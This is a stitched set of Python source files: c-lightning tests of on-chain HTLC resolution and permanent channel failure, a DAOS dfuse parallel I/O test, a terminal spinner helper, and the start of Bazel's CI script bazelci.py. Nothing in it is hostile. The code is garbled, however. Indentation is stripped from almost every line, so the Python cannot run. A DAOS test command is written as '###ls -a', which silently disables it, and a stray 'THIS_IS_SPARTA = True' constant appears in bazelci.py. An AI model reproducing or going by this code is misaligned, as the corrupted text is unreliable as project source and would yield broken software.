# Now, the live attempts with CLTV2 (blackholed by end nodes)
r = nodes[0].rpc.getroute(nodes[-1].info['id'], 10**8, 1)["route"]
nodes[0].rpc.sendpay(r, h)
r = nodes[-1].rpc.getroute(nodes[0].info['id'], 10**8, 1)["route"]
nodes[-1].rpc.sendpay(r, h)
# We send second HTLC from different node, since they refuse to send
# multiple with same hash.
r = nodes[1].rpc.getroute(nodes[-1].info['id'], 10**8, 1)["route"]
nodes[1].rpc.sendpay(r, h)
r = nodes[-2].rpc.getroute(nodes[0].info['id'], 10**8, 1)["route"]
nodes[-2].rpc.sendpay(r, h)
# Now increment CLTV -> CLTV3.
bitcoind.generate_block(1)
sync_blockheight(bitcoind, nodes)
r = nodes[2].rpc.getroute(nodes[-1].info['id'], 10**8, 1)["route"]
nodes[2].rpc.sendpay(r, h)
r = nodes[-3].rpc.getroute(nodes[0].info['id'], 10**8, 1)["route"]
nodes[-3].rpc.sendpay(r, h)
# Make sure HTLCs have reached the end.
nodes[0].daemon.wait_for_logs(['peer_in WIRE_UPDATE_ADD_HTLC'] * 3)
nodes[-1].daemon.wait_for_logs(['peer_in WIRE_UPDATE_ADD_HTLC'] * 3)
return h, nodes
@unittest.skipIf(not DEVELOPER, "needs DEVELOPER=1 for dev_ignore_htlcs")
@unittest.skipIf(SLOW_MACHINE and VALGRIND, "slow test")
def test_onchain_multihtlc_our_unilateral(node_factory, bitcoind):
"""Node pushes a channel onchain with multiple HTLCs with same payment_hash """
h, nodes = setup_multihtlc_test(node_factory, bitcoind)
mid = len(nodes) // 2
for i in range(len(nodes) - 1):
assert only_one(nodes[i].rpc.listpeers(nodes[i + 1].info['id'])['peers'])['connected']
# Now midnode goes onchain with n+1 channel.
nodes[mid].rpc.dev_fail(nodes[mid + 1].info['id'])
nodes[mid].wait_for_channel_onchain(nodes[mid + 1].info['id'])
bitcoind.generate_block(1)
nodes[mid].daemon.wait_for_log(' to ONCHAIN')
nodes[mid + 1].daemon.wait_for_log(' to ONCHAIN')
# Now, restart and manually reconnect end nodes (so they don't ignore HTLCs)
# In fact, they'll fail them with WIRE_TEMPORARY_NODE_FAILURE.
nodes[0].restart()
nodes[-1].restart()
# We disabled auto-reconnect so we'd detect breakage, so manually reconnect.
nodes[0].rpc.connect(nodes[1].info['id'], 'localhost', nodes[1].port)
nodes[-1].rpc.connect(nodes[-2].info['id'], 'localhost', nodes[-2].port)
# Wait for HTLCs to stabilize.
nodes[0].daemon.wait_for_logs(['peer_out WIRE_UPDATE_FAIL_HTLC'] * 3)
nodes[0].daemon.wait_for_log('peer_out WIRE_COMMITMENT_SIGNED')
nodes[0].daemon.wait_for_log('peer_out WIRE_REVOKE_AND_ACK')
nodes[-1].daemon.wait_for_logs(['peer_out WIRE_UPDATE_FAIL_HTLC'] * 3)
nodes[-1].daemon.wait_for_log('peer_out WIRE_COMMITMENT_SIGNED')
nodes[-1].daemon.wait_for_log('peer_out WIRE_REVOKE_AND_ACK')
# At depth 5, midnode will spend its own to-self output.
bitcoind.generate_block(4)
nodes[mid].wait_for_onchaind_broadcast('OUR_DELAYED_RETURN_TO_WALLET',
'OUR_UNILATERAL/DELAYED_OUTPUT_TO_US')
# The three outgoing HTLCs time out at 21, 21 and 22 blocks.
bitcoind.generate_block(16)
nodes[mid].wait_for_onchaind_broadcast('OUR_HTLC_TIMEOUT_TX',
'OUR_UNILATERAL/OUR_HTLC')
nodes[mid].wait_for_onchaind_broadcast('OUR_HTLC_TIMEOUT_TX',
'OUR_UNILATERAL/OUR_HTLC')
bitcoind.generate_block(1)
nodes[mid].wait_for_onchaind_broadcast('OUR_HTLC_TIMEOUT_TX',
'OUR_UNILATERAL/OUR_HTLC')
# And three more for us to consider them all settled.
bitcoind.generate_block(3)
# Now, those nodes should have correctly failed the HTLCs
for n in nodes[:mid - 1]:
with pytest.raises(RpcError, match=r'WIRE_PERMANENT_CHANNEL_FAILURE'):
n.rpc.waitsendpay(h, TIMEOUT)
# Other timeouts are 27,27,28 blocks.
bitcoind.generate_block(2)
nodes[mid].daemon.wait_for_logs(['Ignoring output.*: OUR_UNILATERAL/THEIR_HTLC'] * 2)
for _ in range(2):
nodes[mid + 1].wait_for_onchaind_broadcast('OUR_HTLC_TIMEOUT_TO_US',
'THEIR_UNILATERAL/OUR_HTLC')
bitcoind.generate_block(1)
nodes[mid].daemon.wait_for_log('Ignoring output.*: OUR_UNILATERAL/THEIR_HTLC')
nodes[mid + 1].wait_for_onchaind_broadcast('OUR_HTLC_TIMEOUT_TO_US',
'THEIR_UNILATERAL/OUR_HTLC')
# Depth 3 to consider it settled.
bitcoind.generate_block(3)
for n in nodes[mid + 1:]:
with pytest.raises(RpcError, match=r'WIRE_PERMANENT_CHANNEL_FAILURE'):
n.rpc.waitsendpay(h, TIMEOUT)
# At depth 100 it's all done (we didn't bother waiting for mid+1's
# spends, so that might still be going)
bitcoind.generate_block(97)
nodes[mid].daemon.wait_for_logs(['onchaind complete, forgetting peer'])
# No other channels should have failed.
for i in range(len(nodes) - 1):
if i != mid:
assert only_one(nodes[i].rpc.listpeers(nodes[i + 1].info['id'])['peers'])['connected']
@unittest.skipIf(not DEVELOPER, "needs DEVELOPER=1 for dev_ignore_htlcs")
@unittest.skipIf(SLOW_MACHINE and VALGRIND, "slow test")
def test_onchain_multihtlc_their_unilateral(node_factory, bitcoind):
"""Node pushes a channel onchain with multiple HTLCs with same payment_hash """
h, nodes = setup_multihtlc_test(node_factory, bitcoind)
mid = len(nodes) // 2
for i in range(len(nodes) - 1):
assert only_one(nodes[i].rpc.listpeers(nodes[i + 1].info['id'])['peers'])['connected']
# Now midnode+1 goes onchain with midnode channel.
nodes[mid + 1].rpc.dev_fail(nodes[mid].info['id'])
nodes[mid + 1].wait_for_channel_onchain(nodes[mid].info['id'])
bitcoind.generate_block(1)
nodes[mid].daemon.wait_for_log(' to ONCHAIN')
nodes[mid + 1].daemon.wait_for_log(' to ONCHAIN')
# Now, restart and manually reconnect end nodes (so they don't ignore HTLCs)
# In fact, they'll fail them with WIRE_TEMPORARY_NODE_FAILURE.
nodes[0].restart()
nodes[-1].restart()
# We disabled auto-reconnect so we'd detect breakage, so manually reconnect.
nodes[0].rpc.connect(nodes[1].info['id'], 'localhost', nodes[1].port)
nodes[-1].rpc.connect(nodes[-2].info['id'], 'localhost', nodes[-2].port)
# Wait for HTLCs to stabilize.
nodes[0].daemon.wait_for_logs(['peer_out WIRE_UPDATE_FAIL_HTLC'] * 3)
nodes[0].daemon.wait_for_log('peer_out WIRE_COMMITMENT_SIGNED')
nodes[0].daemon.wait_for_log('peer_out WIRE_REVOKE_AND_ACK')
nodes[-1].daemon.wait_for_logs(['peer_out WIRE_UPDATE_FAIL_HTLC'] * 3)
nodes[-1].daemon.wait_for_log('peer_out WIRE_COMMITMENT_SIGNED')
nodes[-1].daemon.wait_for_log('peer_out WIRE_REVOKE_AND_ACK')
# At depth 5, midnode+1 will spend its own to-self output.
bitcoind.generate_block(4)
nodes[mid + 1].wait_for_onchaind_broadcast('OUR_DELAYED_RETURN_TO_WALLET',
                                           'OUR_UNILATERAL/DELAYED_OUTPUT_TO_US')
# The three outgoing HTLCs time out at depth 21, 21 and 22 blocks.
bitcoind.generate_block(16)
nodes[mid].wait_for_onchaind_broadcast('OUR_HTLC_TIMEOUT_TO_US',
'THEIR_UNILATERAL/OUR_HTLC')
nodes[mid].wait_for_onchaind_broadcast('OUR_HTLC_TIMEOUT_TO_US',
'THEIR_UNILATERAL/OUR_HTLC')
bitcoind.generate_block(1)
nodes[mid].wait_for_onchaind_broadcast('OUR_HTLC_TIMEOUT_TO_US',
'THEIR_UNILATERAL/OUR_HTLC')
# At depth 3 we consider them all settled.
bitcoind.generate_block(3)
# Now, those nodes should have correctly failed the HTLCs
for n in nodes[:mid - 1]:
with pytest.raises(RpcError, match=r'WIRE_PERMANENT_CHANNEL_FAILURE'):
n.rpc.waitsendpay(h, TIMEOUT)
# Other timeouts are at depths 27,27,28 blocks.
bitcoind.generate_block(2)
nodes[mid].daemon.wait_for_logs(['Ignoring output.*: THEIR_UNILATERAL/THEIR_HTLC'] * 2)
for _ in range(2):
nodes[mid + 1].wait_for_onchaind_broadcast('OUR_HTLC_TIMEOUT_TX',
'OUR_UNILATERAL/OUR_HTLC')
bitcoind.generate_block(1)
nodes[mid].daemon.wait_for_log('Ignoring output.*: THEIR_UNILATERAL/THEIR_HTLC')
nodes[mid + 1].wait_for_onchaind_broadcast('OUR_HTLC_TIMEOUT_TX',
'OUR_UNILATERAL/OUR_HTLC')
# At depth 3 we consider them all settled.
bitcoind.generate_block(3)
for n in nodes[mid + 1:]:
with pytest.raises(RpcError, match=r'WIRE_PERMANENT_CHANNEL_FAILURE'):
n.rpc.waitsendpay(h, TIMEOUT)
# At depth 5, mid+1 can spend HTLC_TIMEOUT_TX output.
bitcoind.generate_block(1)
for _ in range(2):
nodes[mid + 1].wait_for_onchaind_broadcast('OUR_DELAYED_RETURN_TO_WALLET',
'OUR_HTLC_TIMEOUT_TX/DELAYED_OUTPUT_TO_US')
bitcoind.generate_block(1)
nodes[mid + 1].wait_for_onchaind_broadcast('OUR_DELAYED_RETURN_TO_WALLET',
'OUR_HTLC_TIMEOUT_TX/DELAYED_OUTPUT_TO_US')
# At depth 100 they're all done.
bitcoind.generate_block(100)
nodes[mid].daemon.wait_for_logs(['onchaind complete, forgetting peer'])
nodes[mid + 1].daemon.wait_for_logs(['onchaind complete, forgetting peer'])
# No other channels should have failed.
for i in range(len(nodes) - 1):
if i != mid:
assert only_one(nodes[i].rpc.listpeers(nodes[i + 1].info['id'])['peers'])['connected']
@unittest.skipIf(not DEVELOPER, "needs DEVELOPER=1")
def test_permfail_htlc_in(node_factory, bitcoind, executor):
# Test case where we fail with unsettled incoming HTLC.
disconnects = ['-WIRE_UPDATE_FULFILL_HTLC', 'permfail']
# Feerates identical so we don't get gratuitous commit to update them
l1 = node_factory.get_node(options={'dev-no-reconnect': None}, feerates=(7500, 7500, 7500))
l2 = node_factory.get_node(disconnect=disconnects)
l1.rpc.connect(l2.info['id'], 'localhost', l2.port)
l1.fund_channel(l2, 10**6)
# This will fail at l2's end.
t = executor.submit(l1.pay, l2, 200000000)
l2.daemon.wait_for_log('dev_disconnect permfail')
l2.wait_for_channel_onchain(l1.info['id'])
bitcoind.generate_block(1)
l1.daemon.wait_for_log('Their unilateral tx, old commit point')
l1.daemon.wait_for_log(' to ONCHAIN')
l2.daemon.wait_for_log(' to ONCHAIN')
l2.daemon.wait_for_log('Propose handling OUR_UNILATERAL/THEIR_HTLC by THEIR_HTLC_TIMEOUT_TO_THEM \\(IGNORING\\) after 6 blocks')
l1.daemon.wait_for_log('Propose handling THEIR_UNILATERAL/OUR_HTLC by OUR_HTLC_TIMEOUT_TO_US (.*) after 6 blocks')
# l2 then gets preimage, uses it instead of ignoring
l2.wait_for_onchaind_broadcast('OUR_HTLC_SUCCESS_TX',
'OUR_UNILATERAL/THEIR_HTLC')
bitcoind.generate_block(1)
# OK, l1 sees l2 fulfill htlc.
l1.daemon.wait_for_log('THEIR_UNILATERAL/OUR_HTLC gave us preimage')
l2.daemon.wait_for_log('Propose handling OUR_HTLC_SUCCESS_TX/DELAYED_OUTPUT_TO_US by OUR_DELAYED_RETURN_TO_WALLET .* after 5 blocks')
bitcoind.generate_block(5)
l2.wait_for_onchaind_broadcast('OUR_DELAYED_RETURN_TO_WALLET',
'OUR_HTLC_SUCCESS_TX/DELAYED_OUTPUT_TO_US')
t.cancel()
# Now, after 100 blocks it should be done.
bitcoind.generate_block(95)
l1.daemon.wait_for_log('onchaind complete, forgetting peer')
assert not l2.daemon.is_in_log('onchaind complete, forgetting peer')
bitcoind.generate_block(5)
l2.daemon.wait_for_log('onchaind complete, forgetting peer')
@unittest.skipIf(not DEVELOPER, "needs DEVELOPER=1")
def test_permfail_htlc_out(node_factory, bitcoind, executor):
# Test case where we fail with unsettled outgoing HTLC.
disconnects = ['+WIRE_REVOKE_AND_ACK', 'permfail']
l1 = node_factory.get_node(options={'dev-no-reconnect': None})
# Feerates identical so we don't get gratuitous commit to update them
l2 = node_factory.get_node(disconnect=disconnects, feerates=(7500, 7500, 7500))
l1.rpc.connect(l2.info['id'], 'localhost', l2.port)
l2.daemon.wait_for_log('openingd-{} chan #1: Handed peer, entering loop'.format(l1.info['id']))
l2.fund_channel(l1, 10**6)
# This will fail at l2's end.
t = executor.submit(l2.pay, l1, 200000000)
l2.daemon.wait_for_log('dev_disconnect permfail')
l2.wait_for_channel_onchain(l1.info['id'])
bitcoind.generate_block(1)
l1.daemon.wait_for_log('Their unilateral tx, old commit point')
l1.daemon.wait_for_log(' to ONCHAIN')
l2.daemon.wait_for_log(' to ONCHAIN')
l2.daemon.wait_for_logs([
'Propose handling OUR_UNILATERAL/OUR_HTLC by OUR_HTLC_TIMEOUT_TX \\(.*\\) after 6 blocks',
'Propose handling OUR_UNILATERAL/DELAYED_OUTPUT_TO_US by OUR_DELAYED_RETURN_TO_WALLET .* after 5 blocks'
])
l1.daemon.wait_for_log('Propose handling THEIR_UNILATERAL/THEIR_HTLC by THEIR_HTLC_TIMEOUT_TO_THEM \\(IGNORING\\) after 6 blocks')
# l1 then gets preimage, uses it instead of ignoring
l1.wait_for_onchaind_broadcast('THEIR_HTLC_FULFILL_TO_US',
'THEIR_UNILATERAL/THEIR_HTLC')
# l2 sees l1 fulfill tx.
bitcoind.generate_block(1)
l2.daemon.wait_for_log('OUR_UNILATERAL/OUR_HTLC gave us preimage')
t.cancel()
# l2 can send OUR_DELAYED_RETURN_TO_WALLET after 3 more blocks.
bitcoind.generate_block(3)
l2.wait_for_onchaind_broadcast('OUR_DELAYED_RETURN_TO_WALLET',
'OUR_UNILATERAL/DELAYED_OUTPUT_TO_US')
# Now, after 100 blocks they should be done.
bitcoind.generate_block(95)
sync_blockheight(bitcoind, [l1, l2])
assert not l1.daemon.is_in_log('onchaind complete, forgetting peer')
assert not l2.daemon.is_in_log('onchaind complete, forgetting peer')
bitcoind.generate_block(1)
l1.daemon.wait_for_log('onchaind complete, forgetting peer')
sync_blockheight(bitcoind, [l2])
assert not l2.daemon.is_in_log('onchaind complete, forgetting peer')
bitcoind.generate_block(3)
sync_blockheight(bitcoind, [l2])
assert not l2.daemon.is_in_log('onchaind complete, forgetting peer')
bitcoind.generate_block(1)
wait_for(lambda: l2.rpc.listpeers()['peers'] == [])
@unittest.skipIf(not DEVELOPER, "needs DEVELOPER=1")
def test_permfail(node_factory, bitcoind):
l1, l2 = node_factory.line_graph(2)
# The funding change should be confirmed and our only output
assert [o['status'] for o in l1.rpc.listfunds()['outputs']] == ['confirmed']
l1.pay(l2, 200000000)
# Make sure l2 has received sig with 0 htlcs!
l2.daemon.wait_for_log('Received commit_sig with 1 htlc sigs')
l2.daemon.wait_for_log('Received commit_sig with 0 htlc sigs')
# Make sure l1 has final revocation.
l1.daemon.wait_for_log('Sending commit_sig with 1 htlc sigs')
l1.daemon.wait_for_log('Sending commit_sig with 0 htlc sigs')
l1.daemon.wait_for_log('peer_in WIRE_REVOKE_AND_ACK')
# We fail l2, so l1 will reconnect to it.
l2.rpc.dev_fail(l1.info['id'])
l2.daemon.wait_for_log('Failing due to dev-fail command')
l2.wait_for_channel_onchain(l1.info['id'])
assert l1.bitcoin.rpc.getmempoolinfo()['size'] == 1
# Now grab the close transaction
closetxid = only_one(l1.bitcoin.rpc.getrawmempool(False))
# l2 will send out tx (l1 considers it a transient error)
bitcoind.generate_block(1)
l1.daemon.wait_for_log('Their unilateral tx, old commit point')
l1.daemon.wait_for_log(' to ONCHAIN')
l2.daemon.wait_for_log(' to ONCHAIN')
l2.daemon.wait_for_log('Propose handling OUR_UNILATERAL/DELAYED_OUTPUT_TO_US by OUR_DELAYED_RETURN_TO_WALLET (.*) after 5 blocks')
wait_for(lambda: only_one(l1.rpc.listpeers(l2.info['id'])['peers'][0]['channels'])['status']
== ['ONCHAIN:Tracking their unilateral close',
'ONCHAIN:All outputs resolved: waiting 99 more blocks before forgetting channel'])
def check_billboard():
billboard = only_one(l2.rpc.listpeers(l1.info['id'])['peers'][0]['channels'])['status']
return (
len(billboard) == 2
and billboard[0] == 'ONCHAIN:Tracking our own unilateral close'
and re.fullmatch(r'ONCHAIN:.* outputs unresolved: in 4 blocks will spend DELAYED_OUTPUT_TO_US \(.*:0\) using OUR_DELAYED_RETURN_TO_WALLET', billboard[1])
)
wait_for(check_billboard)
# Now, mine 4 blocks so it sends out the spending tx.
bitcoind.generate_block(4)
# onchaind notes to-local payment immediately.
assert (closetxid, "confirmed") in set([(o['txid'], o['status']) for o in l1.rpc.listfunds()['outputs']])
# Restart, should still be confirmed (fails: unwinding blocks erases
# the confirmation, and we don't re-make it).
l1.restart()
wait_for(lambda: (closetxid, "confirmed") in set([(o['txid'], o['status']) for o in l1.rpc.listfunds()['outputs']]))
# It should send the to-wallet tx.
l2.wait_for_onchaind_broadcast('OUR_DELAYED_RETURN_TO_WALLET',
'OUR_UNILATERAL/DELAYED_OUTPUT_TO_US')
# 100 after l1 sees tx, it should be done.
bitcoind.generate_block(95)
wait_for(lambda: l1.rpc.listpeers()['peers'] == [])
wait_for(lambda: only_one(l2.rpc.listpeers(l1.info['id'])['peers'][0]['channels'])['status'] == [
'ONCHAIN:Tracking our own unilateral close',
'ONCHAIN:All outputs resolved: waiting 5 more blocks before forgetting channel'
])
# Now, after 100 blocks l2 should be done.
bitcoind.generate_block(5)
wait_for(lambda: l2.rpc.listpeers()['peers'] == [])
# Only l1 has a direct output since all of l2's outputs are respent (it
# failed). Also the output should now be listed as confirmed since we
# generated some more blocks.
assert (closetxid, "confirmed") in set([(o['txid'], o['status']) for o in l1.rpc.listfunds()['outputs']])
addr = l1.bitcoin.rpc.getnewaddress()
l1.rpc.withdraw(addr, "all")
@unittest.skipIf(not DEVELOPER, "needs DEVELOPER=1")
def test_shutdown(node_factory):
# Fail, in that it will exit before cleanup.
l1 = node_factory.get_node(may_fail=True)
if not VALGRIND:
leaks = l1.rpc.dev_memleak()['leaks']
if len(leaks):
raise Exception("Node {} has memory leaks: {}"
.format(l1.daemon.lightning_dir, leaks))
l1.rpc.stop()
|
parallel_io.py
|
#!/usr/bin/python
"""
(C) Copyright 2020-2022 Intel Corporation.
SPDX-License-Identifier: BSD-2-Clause-Patent
"""
import threading
import subprocess #nosec
import time
from getpass import getuser
import general_utils
from ClusterShell.NodeSet import NodeSet
from exception_utils import CommandFailure
from fio_test_base import FioBase
from ior_test_base import IorTestBase
# pylint: disable=too-many-ancestors
class ParallelIo(FioBase, IorTestBase):
"""Base Parallel IO test class.
:avocado: recursive
"""
def __init__(self, *args, **kwargs):
"""Initialize a ParallelIo object."""
super().__init__(*args, **kwargs)
self.dfuse = None
self.cont_count = None
self.pool_count = None
self.statvfs_info_initial = None
self.statvfs_before_cont_destroy = None
self.statvfs_after_cont_destroy = None
self.pool = []
self.container = []
def create_pool(self):
"""Create a TestPool object to use with ior."""
self.pool.append(self.get_pool(connect=False))
def stat_bfree(self, path):
"""Get stat bfree.
Args:
path (str): path for which to get the free block count.
Returns:
int: number of free blocks reported by stat
"""
cmd = ["ssh", "{}@{}".format(getuser(), self.hostlist_clients[0]),
"stat -c%a -f {}".format(path)]
try:
result = subprocess.check_output(cmd)
except subprocess.CalledProcessError as err:
self.fail("Get free block size method failed with: {}".format(err))
return int(result)
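# For illustration only (hypothetical user, host and mount path), the command
# assembled above expands to something like:
#   ssh jdoe@client-01 "stat -c%a -f /tmp/daos_dfuse/<pool-uuid>"
# where "stat -f" reports filesystem status and "%a" prints the number of
# free blocks available to non-superusers.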
def statvfs_pool(self, path):
"""Obtain the free space for the pool using statvfs.
Args:
path (str): path for which free space needs to be obtained.
Returns:
list: list of free space info for each pool in self.pool.
"""
statvfs_list = []
for _, pool in enumerate(self.pool):
dfuse_pool_dir = str(path + "/" + pool.uuid)
statvfs_info = self.stat_bfree(dfuse_pool_dir)
statvfs_list.append(statvfs_info)
self.log.info("Statvfs List Output: %s", statvfs_list)
return statvfs_list
def verify_aggregation(self, reduced_space, count):
"""Verify aggregation.
Verify if expected space is returned for each pool after containers
were destroyed. If not, wait 60 secs and check again, retrying up to
4 times before failing the test.
Args:
reduced_space (int): expected space to be returned
count (int): aggregation index
"""
counter = 1
while (self.statvfs_after_cont_destroy[count] <
self.statvfs_before_cont_destroy[count] + reduced_space):
# try to wait for 4 x 60 secs for aggregation to be completed
# or else exit the test with a failure.
if counter > 4:
self.log.info("Free space before io: %s",
self.statvfs_info_initial)
self.log.info("Free space after io: %s",
self.statvfs_before_cont_destroy)
self.log.info("Free space at test termination: %s",
self.statvfs_after_cont_destroy)
self.fail("Aggregation did not complete as expected")
time.sleep(60)
self.statvfs_after_cont_destroy = self.statvfs_pool(
self.dfuse.mount_dir.value)
counter += 1
def test_parallelio(self):
"""Jira ID: DAOS-3775.
Test Description:
Purpose of this test is to mount dfuse and verify multiple
containers using fio.
Use cases:
Mount dfuse using pool uuid.
Create multiple containers under that dfuse mount point.
Check those containers are accessible from that mount point.
Perform io to those containers using FIO
Delete one of the containers
Check if dfuse is still running. If not, fail the test and exit.
Otherwise, try accessing the deleted container.
This should fail.
Check dfuse again.
:avocado: tags=all,full_regression
:avocado: tags=hw,medium,ib2
:avocado: tags=daosio,tx,dfuse
:avocado: tags=parallelio
"""
# get test params for cont and pool count
self.cont_count = self.params.get("cont_count", '/run/container/*')
threads = []
# Create a pool and start dfuse.
self.create_pool()
self.start_dfuse(self.hostlist_clients, self.pool[0], None)
# create multiple containers
self.add_container_qty(self.cont_count, self.pool[0])
# check if all the created containers can be accessed and perform
# io on each container using fio in parallel
for _, cont in enumerate(self.container):
dfuse_cont_dir = self.dfuse.mount_dir.value + "/" + cont.uuid
cmd = "ls -a {}".format(dfuse_cont_dir)
try:
# execute bash cmds
ret_code = general_utils.pcmd(
self.hostlist_clients, cmd, timeout=30)
if 0 not in ret_code:
error_hosts = NodeSet(
",".join(
[str(node_set) for code, node_set in
list(ret_code.items()) if code != 0]))
raise CommandFailure(
"Error running '{}' on the following "
"hosts: {}".format(cmd, error_hosts))
# report error if any command fails
except CommandFailure as error:
self.log.error("ParallelIo Test Failed: %s",
str(error))
self.fail("Test was expected to pass but "
"it failed.\n")
# run fio on all containers
thread = threading.Thread(target=self.execute_fio, args=(
self.dfuse.mount_dir.value + "/" + cont.uuid, False))
threads.append(thread)
thread.start()
# wait for all fio jobs to be finished
for job in threads:
job.join()
# destroy first container
container_to_destroy = self.container[0].uuid
self.container[0].destroy(1)
# check dfuse if it is running fine
self.dfuse.check_running()
# try accessing destroyed container, it should fail
try:
self.execute_fio(
self.dfuse.mount_dir.value + "/" + container_to_destroy, False)
self.fail(
"Fio was able to access destroyed container: {}".format(
self.container[0].uuid))
except CommandFailure as error:
self.log.info("This run is expected to fail")
# check dfuse is still running after attempting to access deleted
# container.
self.dfuse.check_running()
def test_multipool_parallelio(self):
"""Jira ID: DAOS-3775.
Test Description:
Purpose of this test is to verify aggregation across multiple
pools and containers.
Use cases:
Create 10 pools
Create 10 containers under each pool.
Record statvfs free space for each pool.
Perform parallel io to each pool without deleting the file
after write.
Record free space using statvfs after write.
Delete half of the containers from each pool.
Calculate the expected amount of data to be deleted when
containers are destroyed.
Record free space after container destroy.
Loop until all the space is returned after aggregation completes, or
give up and fail the test after waiting for up to 240 secs.
:avocado: tags=all,full_regression
:avocado: tags=hw,medium,ib2
:avocado: tags=daosio,dfuse
:avocado: tags=multipoolparallelio
"""
# test params
threads = []
pool_threads = []
cont_threads = []
self.pool_count = self.params.get("pool_count", '/run/pool/*')
self.cont_count = self.params.get("cont_count", '/run/container/*')
processes = self.params.get("np", '/run/ior/client_processes/*')
# Create pools in parallel.
for _ in range(self.pool_count):
pool_thread = threading.Thread(target=self.create_pool)
pool_threads.append(pool_thread)
pool_thread.start()
# wait for pool create threads to finish
for pool_job in pool_threads:
pool_job.join()
# start dfuse.
self.start_dfuse(self.hostlist_clients, None, None)
# record free space using statvfs before any data is written.
self.statvfs_info_initial = self.statvfs_pool(
self.dfuse.mount_dir.value)
# Create 10 containers for each pool. Container create process cannot
# be parallelised as different container create could complete at
# different times and get appended to the self.container list in an
# unordered manner, causing problems during the write process.
for _, pool in enumerate(self.pool):
self.add_container_qty(self.cont_count, pool)
# Try to access each dfuse mounted container using ls. Once it is
# accessed successfully, go ahead and perform io on that location
# using ior. This process of performing io is done in parallel for
# all containers using threads.
for pool_count, pool in enumerate(self.pool):
dfuse_pool_dir = str(self.dfuse.mount_dir.value + "/" + pool.uuid)
for counter in range(self.cont_count):
cont_num = (pool_count * self.cont_count) + counter
dfuse_cont_dir = str(dfuse_pool_dir + "/" +
self.container[cont_num].uuid)
cmd = "###ls -a {}".format(dfuse_cont_dir)
self.execute_cmd(cmd)
# run ior on all containers
test_file = dfuse_cont_dir + "/testfile"
self.ior_cmd.test_file.update(test_file)
self.ior_cmd.set_daos_params(
self.server_group, pool, self.container[cont_num].uuid)
thread = threading.Thread(
target=self.run_ior,
args=(self.get_ior_job_manager_command(), processes, None,
False))
threads.append(thread)
thread.start()
# wait for all ior jobs to be finished
for job in threads:
job.join()
# Record free space after io
self.statvfs_before_cont_destroy = self.statvfs_pool(
self.dfuse.mount_dir.value)
# Destroy half of the containers from each pool
pfinal = 0
for count in range(self.pool_count):
pinitial = pfinal
pfinal = pinitial + (self.cont_count // 2)
del self.container[pinitial:pfinal]
for cont in self.container:
cont_thread = threading.Thread(target=cont.destroy)
cont_threads.append(cont_thread)
cont_thread.start()
for destroy_job in cont_threads:
destroy_job.join()
# Record free space after container destroy.
self.statvfs_after_cont_destroy = self.statvfs_pool(
self.dfuse.mount_dir.value)
# Calculate the expected space to be returned after containers
# are destroyed.
reduced_space = (self.cont_count *
int(self.ior_cmd.block_size.value))/2
# Verify if expected space is returned for each pool after containers
# were destroyed. If not, wait for 60 secs and check again. Wait 4
# times, otherwise exit the test with a failure.
for count in range(self.pool_count):
thread = threading.Thread(
target=self.verify_aggregation,
args=(reduced_space, count))
threads.append(thread)
thread.start()
for job in threads:
job.join()
|
spinner.py
|
# From: https://stackoverflow.com/a/39504463
# License: Creative Commons Attribution-Share Alike
# Copyright: Victor Moyseenko
import sys
import time
import threading
class Spinner:
busy = False
delay = 0.1
@staticmethod
def spinning_cursor():
while True:
for cursor in "|/-\\":
yield cursor
def __init__(self, delay=None):
self.spinner_generator = self.spinning_cursor()
if delay and float(delay):
self.delay = delay
def spinner_task(self):
while self.busy:
try:
if sys.stdout.isatty():
sys.stdout.write(next(self.spinner_generator))
sys.stdout.flush()
time.sleep(self.delay)
sys.stdout.write("\b")
sys.stdout.flush()
except Exception:
# we don't care what happens here
pass
def __enter__(self):
self.busy = True
threading.Thread(target=self.spinner_task).start()
def __exit__(self, exception, value, tb):
self.busy = False
time.sleep(self.delay)
if exception is not None:
return False
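# Minimal usage sketch (do_work is a hypothetical caller-supplied function,
# not part of this module):
#
#     with Spinner(delay=0.2):
#         do_work()   # a spinning cursor is shown on a TTY until this exits
#
# Entering the context starts the background thread; leaving it flips
# self.busy to False so spinner_task() returns after at most one more delay.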
|
bazelci.py
|
#!/usr/bin/env python3
#
# Copyright 2018 The Bazel Authors. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import argparse
import base64
import codecs
import datetime
from glob import glob
import hashlib
import json
import multiprocessing
import os
import os.path
import random
import re
import requests
from shutil import copyfile
import shutil
import stat
import subprocess
import sys
import tempfile
import threading
import time
import urllib.error
import urllib.request
import uuid
import yaml
from urllib.request import url2pathname
from urllib.parse import urlparse
# Initialize the random number generator.
random.seed()
BUILDKITE_ORG = os.environ["BUILDKITE_ORGANIZATION_SLUG"]
THIS_IS_PRODUCTION = BUILDKITE_ORG == "bazel"
THIS_IS_TESTING = BUILDKITE_ORG == "bazel-testing"
THIS_IS_TRUSTED = BUILDKITE_ORG == "bazel-trusted"
THIS_IS_SPARTA = True
CLOUD_PROJECT = "bazel-public" if THIS_IS_TRUSTED else "bazel-untrusted"
GITHUB_BRANCH = {"bazel": "master", "bazel-trusted": "master", "bazel-testing": "testing"}[
BUILDKITE_ORG
]
SCRIPT_URL = "https://raw.githubusercontent.com/bazelbuild/continuous-integration/{}/buildkite/bazelci.py?{}".format(
GITHUB_BRANCH, int(time.time())
)
INCOMPATIBLE_FLAG_VERBOSE_FAILURES_URL = "https://raw.githubusercontent.com/bazelbuild/continuous-integration/{}/buildkite/incompatible_flag_verbose_failures.py?{}".format(
GITHUB_BRANCH, int(time.time())
)
AGGREGATE_INCOMPATIBLE_TEST_RESULT_URL = "https://raw.githubusercontent.com/bazelbuild/continuous-integration/{}/buildkite/aggregate_incompatible_flags_test_result.py?{}".format(
GITHUB_BRANCH, int(time.time())
)
EMERGENCY_FILE_URL = "https://raw.githubusercontent.com/bazelbuild/continuous-integration/{}/buildkite/emergency.yml?{}".format(
GITHUB_BRANCH, int(time.time())
)
FLAKY_TESTS_BUCKET = {
"bazel-testing": "gs://bazel-testing-buildkite-stats/flaky-tests-bep/",
"bazel-trusted": "gs://bazel-buildkite-stats/flaky-tests-bep/",
"bazel": "gs://bazel-buildkite-stats/flaky-tests-bep/",
}[BUILDKITE_ORG]
KZIPS_BUCKET = {
"bazel-testing": "gs://bazel-kzips-testing/",
"bazel-trusted": "gs://bazel-kzips/",
"bazel": "gs://bazel-kzips/",
